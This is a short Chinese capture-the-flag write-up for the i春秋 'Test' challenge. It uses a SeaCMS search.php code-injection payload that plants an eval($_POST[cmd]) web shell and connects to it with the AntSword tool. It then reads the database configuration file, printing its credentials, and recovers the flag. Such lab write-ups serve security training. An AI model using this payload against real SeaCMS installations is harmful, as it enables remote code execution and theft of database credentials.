i春秋-Test

Manba_772024-05-12 10:31

题目


解题

参考WP

复制代码 
https://blog.csdn.net/qq_40654505/article/details/107142533/

目录扫描

复现wp

payload为:

复制代码 
search.php?searchtype=5&tid=&area=eval($_POST[cmd])

使用蚁剑连接

复制代码 
http://eci-2ze4iyhwj7xvb68bsb2t.cloudeci1.ichunqiu.com:80/search.php?searchtype=5&tid=&area=eval($_POST[cmd])

cmd

找到数据库配置文件,/var/www/html/data/common.inc.php

复制代码 
<?php
//数据库连接信息
$cfg_dbhost = '127.0.0.1';
$cfg_dbname = 'seacms';
$cfg_dbuser = 'sea_user';
$cfg_dbpwd = '46e06533407e';
$cfg_dbprefix = 'sea_';
$cfg_db_language = 'utf8';
?>

鼠标右击这条shell,选择数据操作,添加上面的数据库用户名和密码连接数据库


复制代码 
flag{d2317097-0b48-4bbc-a968-90ec76ac67ea}
相关推荐
zjeweler7 小时前
万字长文解析:构建从域名发现到框架识别的信息收集
网络安全·渗透测试·信息收集
IT菜鸟程11 小时前
网络安全实战nginx漏洞版本升级 1.28.0到1.30.0
安全·web安全
运维行者_12 小时前
通过OpManager的Windows服务监控能力释放最佳IT网络性能
服务器·开发语言·网络·windows·web安全·php
派拉软件13 小时前
从 IAM 到 AAM,重构 AI Agent 时代的访问控制体系
大数据·人工智能·网络安全·重构·iam·身份与访问控制·aam
天山@12313 小时前
跨站脚本攻击(XSS)深度剖析:从原理到实战绕过及防御体系
网络安全·xss·beef
сокол15 小时前
【网安-应急响应-基础记录】Linux入侵排查
linux·网络安全·系统安全
你觉得脆皮鸡好吃吗15 小时前
SQL注入 手工注入
网络·数据库·sql·安全·web安全·网络安全学习
一名优秀的码农16 小时前
vulhub系列-83-Grotesque:1.0.1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
сокол17 小时前
【网安-Web渗透测试-Linux提权】SUID提权
linux·前端·web安全·网络安全
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点032026年4月AI大事件深度解读:大模型竞争进入“深水区“04近期有什么ai的新消息,新动态? 2026.4月05codex app每次打开重连5次Reconnecting问题解决06AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析07CC-Switch & Claude 基于 Linux 服务器安装使用指南082026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free09从限购到畅通:GLM-5.1 Coding Plan接入攻略102026年AI前瞻:量子AI、具身智能与科学发现的新纪元